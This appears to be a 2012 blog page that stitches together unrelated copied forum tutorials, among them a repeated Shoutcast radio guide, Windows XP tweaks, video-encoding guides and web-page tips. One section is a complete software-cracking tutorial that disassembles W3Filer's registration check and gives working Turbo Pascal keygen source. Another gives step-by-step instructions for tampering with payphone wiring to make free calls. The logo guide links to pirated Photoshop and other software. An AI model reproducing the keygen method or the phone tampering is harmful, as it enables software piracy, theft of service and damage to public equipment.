Thursday, February 16, 2012

How To Make Your Own Radiostation

::Must HAVE Winamp (Any Version)::
First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have alot of latency, just dnt bother)
Second, your going to have to have a domain, an updated one with the current i.p active. (Could be anything e.g. My sig)

Now, Your gonna have to download the Shoutcast Files.

Go to www.shoutcast.com to get the files.

Ok After downloading these, installing Both of them in any order i dnt care. Go to START>PROGRAM FILES>SHOUTcast DNAS>EDIT SHOUTCAST DNS CONFIG.

Ok your gonna have to Configure it:
Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember)
The Portbase: change it to whatever port you want it
Maxusers: (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.

EDIT>SAVE.

Open winamp, RIGHT CLICK>OPTIONS>PREFRENCES>DSP EFFECT> and choose the NULLSOFT SHOUTCAST.

Go to OUTPUT, and then click on Connection, Through the ADDRESS, type your address which you have done through www.no-ip.com, PORT NUMBER, whatever u did in the EDIT.txt, and your password.

Then go to Encoder, and choose your quality of your music. Go back to OUTPU>OUTPUT CONFIG> YELLOW PAGES. this is your advertisemant information. dow hatever you like there.

Now Connect. to check that your Radio os on-line go to http://(your address that you added in the prefrence)

How To Make Your Own Radio Station

How To Make Your Own Radio Station

Must HAVE Winamp (Any Version)
First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have alot of latency, just dnt bother)
Second, your going to have to have a domain, an updated one with the current i.p active. (Could be anything e.g. My sig)

Now, Your gonna have to download the Shoutcast Files.

Go to www.shoutcast.com to get the files.

Ok After downloading these, installing Both of them in any order i dnt care. Go to START>PROGRAM FILES>SHOUTcast DNAS>EDIT SHOUTCAST DNS CONFIG.

Ok your gonna have to Configure it:
Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember)
The Portbase: change it to whatever port you want it
Maxusers: (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.

Open winamp, RIGHT CLICK>OPTIONS>PREFRENCES>DSP EFFECT> and choose the NULLSOFT SHOUTCAST.

Go to OUTPUT, and then click on Connection, Through the ADDRESS, type your address which you have done through www.no-ip.com, PORT NUMBER, whatever u did in the EDIT.txt, and your password.

Then go to Encoder, and choose your quality of your music. Go back to OUTPU>OUTPUT CONFIG> YELLOW PAGES. this is your advertisemant information. dow hatever you like there.

Now Connect. to check that your Radio os on-line go to http://(your address that you added in the prefrence)

How To make your own Radio Station



How To make your own Radio Station ...

::Must HAVE Winamp (Any Version)::

First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have alot of latency, just dnt bother)

Second, your going to have to have a domain, an updated one with the current i.p active. (Could be anything e.g. My sig)

Now, Your gonna have to download the Shoutcast Files.

Go to
:
www.shoutcast.com

to get the files.

Ok After downloading these, installing Both of them in any order i dnt care. Go to START>PROGRAM FILES>SHOUTcast DNAS>EDIT SHOUTCAST DNS CONFIG.

Ok your gonna have to Configure it:
Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember)

The Portbase: change it to whatever port you want it
Maxusers: (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.

EDIT>SAVE.

Open winamp, RIGHT CLICK>OPTIONS>PREFRENCES>DSP EFFECT> and choose the NULLSOFT SHOUTCAST.

Go to OUTPUT, and then click on Connection, Through the ADDRESS, type your address which you have done through
Code:
www.no-ip.com

PORT NUMBER, whatever u did in the EDIT.txt, and your password.

Then go to Encoder, and choose your quality of your music. Go back to OUTPUT>OUTPUT CONFIG> YELLOW PAGES. this is your advertisemant information. dow hatever you like there.

Now Connect. to check that your Radio os on-line go to http:// (your address that you added in the prefrence)

How To Make XP Go Faster

 Services You Can Disable

There are quite a few services you can disable from starting automatically.
This would be to speed up your boot time and free resources.
They are only suggestions so I suggestion you read the description of each one when you run Services
and that you turn them off one at a time.

Some possibilities are:
Alerter
Application Management
Clipbook
Fast UserSwitching
Human Interface Devices
Indexing Service
Messenger
Net Logon
NetMeeting
QOS RSVP
Remote Desktop Help Session Manager
Remote Registry
Routing & Remote Access
SSDP Discovery Service
Universal Plug and Play Device Host
Web Client


--------------------------------------------------------------------------------

Cleaning the Prefetch Directory

WindowsXP has a new feature called Prefetch. This keeps a shortcut to recently used programs.
However it can fill up with old and obsolete programs.

To clean this periodically go to:

Star / Run / Prefetch
Press Ctrl-A to highlight all the shorcuts
Delete them

--------------------------------------------------------------------------------

Not Displaying Logon, Logoff, Startup and Shutdown Status Messages

To turn these off:

Start Regedit
Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem
If it is not already there, create a DWORD value named DisableStatusMessages
Give it a value of 1

--------------------------------------------------------------------------------
Clearing the Page File on Shutdown

Click on the Start button
Go to the Control Panel
Administrative Tools
Local Security Policy
Local Policies
Click on Security Options
Right hand menu - right click on "Shutdown: Clear Virtual Memory Pagefile"
Select "Enable"
Reboot

For regedit users.....
If you want to clear the page file on each shutdown:

Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementClearPageFileAtShutdown
Set the value to 1

--------------------------------------------------------------------------------

No GUI Boot

If you don't need to see the XP boot logo,

Run MSCONFIG
Click on the BOOT.INI tab
Check the box for /NOGUIBOOT

---------------------------------------------------------------------------------
Speeding the Startup of Some CD Burner Programs

If you use program other than the native WindowsXP CD Burner software,
you might be able to increase the speed that it loads.

Go to Control Panel / Administrative Tools / Services
Double-click on IMAPI CD-Burning COM Service
For the Startup Type, select Disabled
Click on the OK button and then close the Services window
If you dont You should notice

--------------------------------------------------------------------------------

Getting Rid of Unread Email Messages

To remove the Unread Email message by user's login names:

Start Regedit
For a single user: Go to HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionUnreadMail
For all users: Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUnreadMail
Create a DWORD key called MessageExpiryDays
Give it a value of 0

------------------------------------------------------------------------------

Decreasing Boot Time

Microsoft has made available a program to analyze and decrease the time it takes to boot to WindowsXP
The program is called BootVis

Uncompress the file.
Run BOOTVIS.EXE
For a starting point, run Trace / Next Boot + Driver Delays
This will reboot your computer and provide a benchmark
After the reboot, BootVis will take a minute or two to show graphs of your system startup.
Note how much time it takes for your system to load (click on the red vertical line)
Then run Trace / Optimize System
Re-Run the Next Boot + Drive Delays
Note how much the time has decreased
Mine went from approximately 33 to 25 seconds.

--------------------------------------------------------------------------------
Increasing Graphics Performance

By default, WindowsXP turns on a lot of shadows, fades, slides etc to menu items.
Most simply slow down their display.

To turn these off selectively:

Right click on the My Computer icon
Select Properties
Click on the Advanced tab
Under Performance, click on the Settings button
To turn them all of, select Adjust for best performance
My preference is to leave them all off except for Show shadows under mouse pointer and Show window contents while dragging

---------------------------------------------------------------------------

Increasing System Performance

If you have 512 megs or more of memory, you can increase system performance
by having the core system kept in memory.

Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementDisablePagingExecutive
Set the value to be 1
Reboot the computer

---------------------------------------------------------------------------

Increasing File System Caching

To increase the amount of memory Windows will locked for I/O operations:

Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management
Edit the key IoPageLockLimit

-----------------------------------------------------------------------------

Resolving Inability to Add or Remove Programs

If a particular user cannot add or remove programs, there might be a simple registry edit neeed.

Go to HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall
Change the DWORD NoAddRemovePrograms to 0 disable it

4096 - 32megs of memory or less
8192 - 32+ megs of memory
16384 - 64+ megs of memory
32768 - 128+ megs of memory
65536 - 256+ megs of memory

How to make key generators ( KEYGEN )

How to make key generators?
-===========================-
Introduction
------------
I take no responsibility of the usage of this information.
This tutorial, is for educational knowledge ONLY.
Hi there, in this tutorial, I intend to teach you how to make a pretty
simple keygen, of a program called W3Filer 32 V1.1.3.
W3Filer is a pretty good web downloader...
I guess some of you might know the program.
I`ll assume you know:
A.How to use debugger (in this case, SoftIce).
B.How to crack, generally (finding protection routines,patching them,etc...).
C.How to use Disassembler (This knowledge can help).
D.Assembly.
E.How to code in Turbo Pascal ™.
Tools you`ll need:
A.SoftIce 3.00/01 or newer.
B.WD32Asm. (Not a must).
C.The program W3Filer V1.13 (if not provided in this package), can be found in
www.windows95.com I believe.
D.Turbo Pascal (ANY version).
Well, enough blah blah, let's go cracking...
Run W3Filer 32.
A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now,
We notice this program has some kind of serial number (Mine is 873977046),
Let's keep the serial in mind, I bet we`ll meet it again while we're on
the debugger.
Well, now, let's put your name and a dummy reg code...
set a BP on GetDlgItemTextA, and, press OK.
We pop inside GetDlgItemTextA, Lets find the registration routine...
I`ll save you the work, the registration routine is this:
:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
:00404DB8 52 push edx ---> Your user name here.
:00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
:00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
:00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
:00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
OK.
Well, Let's enter the CALL 40A2C9, and see what's inside it:
(Please read my comments in the code).
* Referenced by a CALL at Addresses:
|:00404DB9 , :00407F76
|
:0040A2C9 55 push ebp
:0040A2CA 8BEC mov ebp, esp
:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
:0040A2D2 53 push ebx
:0040A2D3 56 push esi
:0040A2D4 57 push edi
:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
:0040A2DE 33C0 xor eax, eax
:0040A2E0 EB16 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A2FB©
|
:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the
interesting part.
:0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current
char in the user name, Hmm, 20h=' '...
:0040A2E8 740D je 0040A2F7 ----> Let's see,
:0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop
does, is copying
the user name from
[EDX], to [ESI], WITHOUT the spaces!
(Keep this in mind! ).
:0040A2EC 880C06 mov byte ptr [esi+eax], cl
:0040A2EF 42 inc edx
:0040A2F0 40 inc eax
:0040A2F1 C6040600 mov byte ptr [esi+eax], 00
:0040A2F5 EB01 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A2E8©
|
:0040A2F7 42 inc edx
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A2E0(U), :0040A2F5(U)
|
:0040A2F8 803A00 cmp byte ptr [edx], 00
:0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got
what it does,
Let's continue tracing
the code...
:0040A2FD 56 push esi --------> The user name is pushed, in order
to
Upcase it's chars.
* Reference To: USER32.CharUpperA, Ord:0000h
|
:0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in
upper case.
:0040A303 56 push esi -----> Our name in upper case here.
* Reference To: cw3220mt._strlen, Ord:0000h
|
:0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
:0040A309 59 pop ecx
:0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
:0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
:0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
:0040A311 83C8FF or eax, FFFFFFFF
:0040A314 EB67 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A30F©
|
:0040A316 33D2 xor edx, edx
:0040A318 33C0 xor eax, eax
:0040A31A 3BC8 cmp ecx, eax
:0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless
checking).
===================================================================================
============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ==================
===================================================================================
One thing before we continue, EDX = 00000000h as we enter to the next instructions.
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A333©
|
:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user
name, offset EAX.
:0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...
(Remember that).
:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in
user name , offset EAX.
:0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the
offset in user name! (Remember that).
:0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was
Shelled (Ding Dong =)).
:0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE
of this registration routine!!!
:0040A330 40 inc eax -----> Increase EAX by one (next char).
:0040A331 3BC8 cmp ecx, eax
:0040A333 7FE9 jg 0040A31E ----> If ECX<EAX then, we leave the
loop.
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A31C©
|
:0040A335 A120674100 mov eax, dword ptr [00416720] ---> HMMMMMM, What's in
here?????
:0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
EAX'
Does this number in EAX look
familiar to us? ;-)
If you still don`t understand,
than, It's
our SERIAL NUMBER! (PLEASE, take
your time, and check by
yourself - don`t trust me!). OK,
so now we know,
That it SHR's EAX by 03 (SAR is
almost identical to SHR).
:0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the
loop, the serial number shr'd by 03h
:0040A33F 52 push edx -------> Let's continue. (At this point, I
can tell you , the reg number, is
in EDX - only that the reg number
is in HEX --> That's how you enter it).
* Possible StringData Ref from Data Obj ->"%lx"
|
:0040A340 685EF54000 push 0040F55E
:0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
:0040A34B 52 push edx
* Reference To: USER32.wsprintfA, Ord:0000h
|
:0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes
the value from EDX, and turns it to an hex string).
:0040A351 83C40C add esp, 0000000C
:0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
THIS is the reg number! That's enough for us, the rest of
the code, is
just for comparing the correct reg code with ours.
:0040A35A 51 push ecx
* Reference To: USER32.CharLowerA, Ord:0000h
|
:0040A35B E8B8320000 Call 0040D618
:0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
:0040A366 50 push eax
:0040A367 FF750C push [ebp+0C]
* Reference To: cw3220mt._strcmp, Ord:0000h
|
:0040A36A E875300000 Call 0040D3E4
:0040A36F 83C408 add esp, 00000008
:0040A372 85C0 test eax, eax
:0040A374 7405 je 0040A37B
:0040A376 83C8FF or eax, FFFFFFFF
:0040A379 EB02 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
|:0040A374©
|
:0040A37B 33C0 xor eax, eax
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A314(U), :0040A379(U)
|
:0040A37D 5F pop edi
:0040A37E 5E pop esi
:0040A37F 5B pop ebx
:0040A380 8BE5 mov esp, ebp
:0040A382 5D pop ebp
:0040A383 C3 ret
Making the actual Keygen
~~~~~~~~~~~~~~~~~~~~~~~~
Now, after I've explained how does the program calculate the registration
code, you can either write your own keymaker, without looking at my code, or
look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time).
That's it, here's the source of my keygen:
------------------- Cut here ---------------------------------------------
Program W3FilerKeygen;
var
Key,SerialNum,EB,ED,digit:Longint;
I,x:Byte;
Name,KeyHex:String;
begin
Writeln(' W3Filer32 V1.1.3 Keymaker');
writeln('Cracked by ^pain^ ''97 / Rebels!');
Write('Your Name:'); { Read the name }
readln(Name);
Write('Serial Number:');
readln(SerialNum); {Yes, we need the serial number for the calculation!}
Key:=0;
x:=0;
For I:=1 to length(Name) do
begin
Name[I]:=upcase(Name[i]);
If Name[I]<>' ' then begin
eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
Ed:=ord(Name[I]); {ED = Name[I]}
ed:=ed*(x); {ED=ED*Offset}
inc(x);
eb:=eb+ed; {Add ED to EB}
Key:=Key+EB; {Add EB to KEY}
end;
end;
Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
{ From here, this is just HEX2STRING --> I`m quite sure it's
Self explaintory, else - go and learn number bases again! ;-)}
KeyHex:='';
repeat
digit:=Key mod 16;
key:=key div 16;
If digit<10 then KeyHex:=Chr(Digit+ord('0'))+KeyHex;
If digit>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
until key=0;
writeln('Your Key:',KeyHex);
writeln(' Enjoy!');
end.

How To Make Free Phone Calls

How To Make Free Phone Calls

 Have you ever got stuck some ware and just about 6'ft away from you there is a pay phone, but yet you dont have any change(=( bummer) to call your famaly members or some one to come and pick you up(hehe that sux)?

Well im going to show you some thing that might get you arrested(shit now what) or it might get you home( now thats what im talking about!)its a chance that you have to take depends were are you.

Ok now before we go on let me let you know that this is not thateasy to do, but anyways lets start. A pay phone is not like a regular home phone. A pay phone runs through a diffrent amount of electricity and wires even the electricity flow is diffrent, Well anyways that is enoght of electrical talk lets get to the good part.

Ok to get free call's on a pay phone you will frist have to twist the phone wire just about 50 to 60 times then you will pull on the phonewire untill the metal part crackes off phone keep doing it if the metalpart is completely off the phone....
Now assuming that it is off you willsee a few colored wires in side the metal wire of the pay phone there should be a black, red, yellow one in side it and a really metallthick one in the middle(NOTE that some phone has diffrent colored wires)now the one wire that we are looking for is the black one. Now here ishow its done.. rip off the plastic of that wire(you can take it out with your teeth, you wont get electricuted =) hehe ).

Now assuming that you have taken apart the plastic off the wire(does not has to be all of it)now you will take that wire and aply it to the phone with the metal part of the phone touching the wire that you ripped off its plastic.. if you are aplying it correctly then you should here a static on the phone.. so make sure you have that phone on your ear.. now with the wire being aplyed to the phone(the metal part right next tothe buttons)Dial the number that you wish to call.. onces you hear it ringing then you can let go of the wire that you was applying.. and BINGO... say hello to mami and daddy for me =).. welp that is all enjoy your call.. ohh and by the wayyes this also comes with long distance hehe, and no! you can not use it to logg on to aol... Peace.

site: www.h4ckerx.net
Aim: xlordt
Irc: irc.h4ckerx.net

Email: xlordt@h4ckerx.net

Copyright @h4ckerx.net

How To Make An Animted Logo

How To Make An Animted Logo, the easy way


Things you will need:
QUOTE
1. Photoshop or Paintshop (any versions)
2. Xara3D 5.xx
3. Jasc animation shop 3.xx
4. DUH!! A pic you want as a logo LOL

Things you MIGHT need:
      1. a computer
      2. Internet connection
      3. consciousness
      4. corn on the cob

Here they are for your convinience:
Adobe Photoshop CS v8.0                thanx to TheCollector
http://www.shareordie.com/index.php?showto...85&hl=Photoshop

Jasc Paint Shop Pro 9.0 Retail        thanx to arclite
http://www.shareordie.com/index.php?showto...&hl=Jasc&st=100

Xara3D 5.02                            thanx to Zabref
http://www.shareordie.com/index.php?showtopic=6512&hl=XARA

Jasc Animation Shop 3.11              thanx to sev7en
http://www.shareordie.com/index.php?showtopic=34928&hl=


Steps:
1. Using your photo editor fix/touch up you pic/logo to your liking….too easy(example bellow)
user posted image

2. Save it some where easy to find, for example “C:\pictures” or “C:\Windows\thecenterofhell\system\system32\system64\system128\???” although I don’t recommend the second one.

3.Open Xara3D 5.xx, press “Alt+T” or click on the “T” button on the LEFT PANEL erase all of the text in the window that pops up then press ok.
user posted image
user posted image

4. Press “Alt+U” or click on the yellow “U” surrounded in gray on the LEFT PANEL, check the “button” box and select a desire button type and leave this option window open you will need it again.
user posted image

5. Press the “At+X” or click the black “X” on the LEFT PANEL, click “load texture” in the pop up window, find the picture you made/adjusted and highlight it then click open or just double-click it. Use the “size, x, y, angle” sliders to adjust the picture or “texture” and in the “button options” windows use the “stretch, corners”(corners, only if using this option you can adjust) to adjust the button size.
user posted image

6. Press “Alt+A” or click the black “A” on the LEFT PANEL with what looks like to me is a half-halo with an arrow tip!? Anyway, here is a quick rundown on what the options here do: (BY THE WAY TO ACTIVATE OR “PREVIEW ANIMATION” PRESS “Ctrl+spacebar”).
user posted image


     A. Frames per cycle: This is the number of frames for each complete cycle through the animation sequence. The greater the number of frames the smoother the animation. The drawback is that the file is bigger - this is a big disadvantage for web graphics. You may need to try different values to get the best results.
     B. Frames per second: The animation speed. Slow speeds can give jerky movement. High speeds can also give jerky movement as the program displaying the animation may not be able to keep up. Again you may need to try different values.
     C. Pause: This pauses the first frame before continuing the rest of the animation. Type in a value in centiseconds (1/100ths of a second) - a 2 second pause is 200 cs. Note that this applies only to the first frame; use Frames per cycle and Frames per second to control the overall speed of the animation.
     D. Loop Value: Unchecked is Infinite, Any other value see for yourself. Lmao
     E. Loop: This lets you specify how many times the animation should repeat itself. Note that some browsers take any value other than 1 to mean 'loop forever'. Therefore, your animation either plays once or forever.
     F. Style: This controls the type of animation:
Rotate 1 rotates all the text as one;    Rotate 2 rotates each character. (Buttons have a single Rotate option.) Rotate text/Rotate lights - select whether you want the text to rotate or the lights or both. You cannot rotate the shadow as this would create very large files. Direction - selects the direction of rotation.

Swing options: Swing 1 swings all the text as one; Swing 2 swings each character. (Buttons have a single Swing option.) Angle - how much you want the heading to swing.

Pulsate options: Pulsate 1 pulsates all the text as one; Pulsate 2 pulsates each character. (Buttons have a single Pulsate option.) Minimum text size - how far back to pulsate the text. Shrink+Grow & Grow+Shrink - only have an effect if you Pause the animation. These options select the starting point for the animation (maximum or minimum.)

      Fade options: Fade in - the heading emerges from the background color. Fade out - the heading merges into the  background color.   SO AFTER PICKING ONE………………..


7. On the top left go to FILE>>>EXPORT ANIMATION or press “Ctrl+Shift+X” and save in desired location.
user posted image

8. When the next window pops up (Export as animated gif save location then options): Experiment with each one to get it right, but remember the SoD rules about Siggys and Avatars.
user posted image
user posted image


Because Animated GIFs can be quite large, you may find that a 16 or 32 color, optimized palette per frame, produces the best results for the smallest file size. However you might need to experiment.
Dithering always makes GIFs look better, but also makes them larger. When outputting at 256 colors you may find that there is no need to turn dithering on.
Current Window Size lets you export just the area surrounding the text (Crop on) or the entire window area (Crop off.)
User Defined lets you specify the dimensions of the bitmap.

how to make a VCD from a DivX

 Tools required: Latest Virtual dub, TMPGEnc and Nero ( and the DivX codecs.)


Preparing:
Download all tools, Be sure to install DivX 3.11 DivX4 and the latest DivX5 codecs.

Extracting the audio : Start Virtualdub. Open your video File->Open video file.(if you get any warnings just ignore them because you won't edit the video just extract the audio)
Select File->File Information and note the fps as the video source fps because you will need it later.
Select under Audio->Full processing mode.
Select Audio->Compression and select <No compression (PCM)>
Select Audio->Conversion.
Change the the Sampling rate to 44100Hz if you are going to make VCD or SVCD MPEGs.
Save the wav by clicking on File->Save WAV...the wav will be a huge audio uncompressed video file(about 10 MB/minute.
Encoding:
Start TMPEnc. Press cancel if the Project Wizard comes.
Press Browse… and select the DivX file as Video source input.
Now you press the Browse button for choosing the Audio source input and use the saved wav file.
Press load and load the file which in the Template directory of TMPGenc.
If the video source fps is 29,970 load VideoCD (NTSC).mcf
If the video source fps is 23,970 load VideoCD (NTSCFilm).mcf
If the video source fps is 25,000 load VideoCD (PAL).mcf
If the video source fps is anything else else just load NTSC if you live in US or Japan and PAL if you live anywhere else.
Note if you live in US or Japan and get problem playing PAL, often causing black and white TV playback problems, then first check if you can change to PAL on your TV or DVD Player if not then instead convert it to NTSC by loading the VideoCD(NTSC) template.
Note if you live Europe and the rest of the world and get problem playing NTSC or NTSCFilm, often causing black and white TV playback problems, then first check if you can change to PAL on your TV or DVD Player if not convert it to PAL by loading the VideoCD(Pal) template.

Press Settings and choose Advanced.
Select Full screen (keep aspect ratio) under Video arrange method to keep the same aspect ratio(widescreen,fullscreen) as the video source(if you have a widescreen movie and you want it to be in fullscreen select No margin(keep aspect ratio).
Select Source range and double-click on it with the mouse.

In the next dialog you can choose the source range. This process depends on the DivX file. If the DivX file is less than 80min (for a 80min/700mb CDR) then you do not have to split the file to two CDs. Also if the DivX file is already in two parts you have just to convert the first file and then the second. But if there should be the case that the movie is in one file over 80minutes long then it is necessary to select the source range. In this new dialog you put the horizontal scrollbar to the middle of the selection so that you will get the same length on the first CD as on the second. After you selected the middle do you have press Set end frame. A new value should be under End Frame. This value you should notice somewhere for the encoding of the second part. Of course the start frame must be 0.



After pressing ok, you only have to select the output file name. I prefer the movie name with the CD number (e.g. Ghost in the Shell CD1) for the burning.
Now encode the file by pressing the Start-Button.
While encoding you can select File->Preview(it won't effect the encoding) to see how the output will be, it it looks wrong(widescreen or fullscreen) you can stop the encoding and start over and change especially the Settings->Advanced->Video arange method.)
If you only want to burn the movie on one CD jump to the burning guide else follow the next points.

Repeat the third, forth and fifth point. In the source range dialog you now use as Start frame the noticed value and move with the horizontal scrollbar to the end of the movie.
After pressing Set end frame, press two times OK.

Now select the output filename for the second file. (e.g. Ghost in the Shell CD2) and encode it.
After the encoding is done and you did all right, you should have for every CD a file.

Burning:
Launch Nero.Close the Wizard. Select File->New.
1. Select VideoCD
2. Select PAL or NTSC depending what format your source MPEG is in.
3. And hit New.

1. Locate your .mpg and drag it(see picture below). Remember that you can add several .mpgs also, each mpg will be a own track on the VCD and you can add data files also, just drag them to any folder.
2. Check the time. It should be the same as in the movie.

3. Rename the CD to anything you like by clicking F2 on NEW.

4. Select File->Write CD.


don't know about everyone else.. but the only options i choose on tmpgenc to make mpeg-1 files are either NTSC film 23.976, or NTSC video 29.97 fps..

i also live in the u.s. so i do all of mine accordingly.. why do you save the wave file with virtual dub.. or should i say, why do you even process the divx file with vdub.. yeah if it is your last resort and the divx for some reason doesn't open in tmpgenc.. i've got 180+ Divx movies, some downloaded mostly ripped, never had a problem encoding them with tmpgenc plus.

just seems like you are going from your a$$ to your elbow to do this.

1. take divx movie (120 minutes long for example).. open with vdub.. find a keyframe about halfway through the film, preferrably at a scene change.

choose "SET SELECTION START" from the EDIT menu.. scroll all the way to the end of the film, choose "SET SELECTION END"... hit DELETE or choose "DELETE SELECTION", all from the EDIT menu

2. Now you have 1 half of your movie. under the VIDEO menu, choose "DIRECT STREAM COPY", also make sure that under AUDIO is going to generate a "DIRECT STREAAM COPY". Then go to FILE and choose "SAVE as AVI..."

on a newer computer this will take less than 2 minutes..

3. When it is complete, the quickest way to proceed is to just click on FILE / "OPEN VIDEO FILE". at the beginning of the clip, choose "SET SELECTION START" again, snap back to the keyframe (half way through the film) which you cut half the film off at and choose "SET SELECTION END". DELETE... FILE / "SAVE AS AVI..." save as the other half of film..

once again, will usually take less than 2 minutes...

4. choose option accordingly, this next part can be important.. (i'm going to give the rest of the instructions as if you were making ntsc movie)

since you want to make a standard mpeg-1 file, choose NTSC FILM or NTSC VIDEO.. BROWSE for your file, then hit NEXT, then it OTHER SETTINGS / ADVANCED tab ... now there is an option that says "VIDEO ARRANGE METHOD".. if you are making a fullscreen movie, lleave on FULLSCREEN.. if you are encoding a widescreen movie, choose "FULL SCREEN (KEEP ASPECT RATIO).. OK / NEXT / NEXT (you get the point)

basically takes 1 step out of the tutorial above.. the instructions for nero appear to be correct.. but here's another tip..

dvd burners are becoming more and more popular and even i got one now, like many of you do. tired of old vcd's or wanna encode a VCD standard DVD with nearly 9 hours of video (but same quality as normal 80 minute VCD),

if this is the case, make sure you encode your DivX files as "NTSC VIDEO 29.97 FPS".. even if source is 23 fps... and once you have 3 or 4 movies, get yourself a proggy called TMPGENC DVD AUTHOR.. make a track for each movie.. and you got yourself a dvd with 3 or 4 average length movies on 1 dvd (with menus if you like) that is WAY MORE COMPATIBLE than a VCD..

do a search for the keyword VCD-DVD and i posted a more descriptive tutorial on how to do this..

how to make a new web site

how to make a new web site
http://www.make-a-web-site.com/
http://www.pagetutor.com/pagetutor/makapage/index.html
www.webmonkey.com

Colour Palletes
http://colormatch.dk

HTMLlock <---Need

http://www.devside.net
http://www.devside.net/download/crypto/disclaimer1.html

well, if you want text seperate from image, you could just do this:


<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<td><td>

your text here, it's totally fun, yeah yeah yeah

</td><td>

<img src="your picture here">

</td></tr>
</table>



if you want to have the image on the left side, and text on the right side, just reverse the code like so:


<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<td valign="bottom" align="left">

<img src="your picture here">

</td>

<td><td>

your text here, it's totally fun, yeah yeah yeah

</td></tr>
</table>

How To Make A Kvcd

 how to make a kvcd or in other words how to get 700meg avi file down to about 450megs to make
a vcd without any picture loss

so youve download a movie its in avi format you want to watch it on your dvd player so
you reencode it it comes out to about 1100 maybe 1200 megs so you got to split it and save on
2 disks well the following tut will show you how to do it on one disk

first you are going to need some tools

virtualdub

CODE
http://heanet.dl.sourceforge.net/sourceforge/virtualdub/VirtualDub-1.5.10.zip


heada3che

CODE
http://mitglied.lycos.de/darkav/download/headac3he-0.23a.rar


and some dlls

CODE
http://mitglied.lycos.de/darkav2/download/MPAlib_MMX-1.00(1.50).rar
http://mitglied.lycos.de/darkav2/download/ssrc_MMX-1.01(1.28).rar
http://mitglied.lycos.de/darkav2/download/Vorbis_MMX-1.20(1.74).rar
http://mitglied.lycos.de/darkav2/download/Lame_enc_MMX-1.28(3.93).rar
http://mitglied.lycos.de/darkav2/download/MP2enc_MMX-1.15(1.13).rar

put the above dlls in the same folder as heada3che

besweet

CODE
http://dspguru.notrace.dk/BeSweetv1.4.zip
http://dspguru.notrace.dk/BeSweetGUIv0.6.zip

put these 2 in the same folder

you will have to have nero as well but im hoping you have that already if not it on this forum

tmpegnc

again its on this forum

you will need some templates

CODE
http://www.kvcd.net/dvd-models.html


